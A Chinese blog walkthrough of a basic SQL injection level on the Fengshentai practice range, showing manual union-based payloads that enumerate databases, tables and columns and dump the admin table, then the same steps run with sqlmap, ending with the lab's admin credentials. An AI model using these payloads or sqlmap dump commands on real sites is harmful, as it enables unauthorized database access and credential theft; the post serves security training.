封神台在线靶场——第一章:为了女神小芳!

sql注入基础版

目录:

手工注入

sqlmap工具跑

在这里插入图片描述
打开传送门,有一个get型传参
在这里插入图片描述

手工注入

判断是否存在sql注入

?id=1 and 1=1

回显正常

在这里插入图片描述

?id=1 and 1=2

显示异常
初步判断存在sql注入
在这里插入图片描述

判断字段数

?id=1 order by 1
?id=1 order by 2

都显示正常

在这里插入图片描述

?id=1 order by 3

页面显示异常,说明有两个回显位
在这里插入图片描述

测试显示位

?id=7777 union select 1,2

在这里插入图片描述
2被输出,说明2的位置是我们要的显示位

爆数据库名

?id=7777 union select 1,(select group_concat(schema_name) from information_schema.schemata)
//这句是爆出所有的数据库名
?id=7777 union select 1,database()
//爆出当前数据库名称

在这里插入图片描述
在这里插入图片描述

爆当前数据库的表名

?id=7777 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘maoshe’

在这里插入图片描述

看一下管理员表,爆列名

?id=7777 union select 1,group_concat(column_name)from information_schema.columns where table_name=‘admin’ and table_schema=‘maoshe’

在这里插入图片描述

爆username和password

?id=7777 union select 1,group_concat(username,‘~’,password,‘///’) from maoshe.admin

查询maoshe库下admin表的username及password字段,用’~'隔开两个字段,以及用///隔开两组查询结果
在这里插入图片描述

虽然但是,,ppt领取微信是什么鬼??装作没看到吧
最后得到管理员账号密码
admin/hellohack

二、使用sqlmap工具跑跑

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1

在这里插入图片描述爆当前数据库

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 --current-db

在这里插入图片描述

爆表名

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -D maoshe --tables

在这里插入图片描述
爆列名

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -T admin --columns

在这里插入图片描述
爆用户名密码

sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -D maoshe -T admin -C username,password --dump

在这里插入图片描述
over!

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值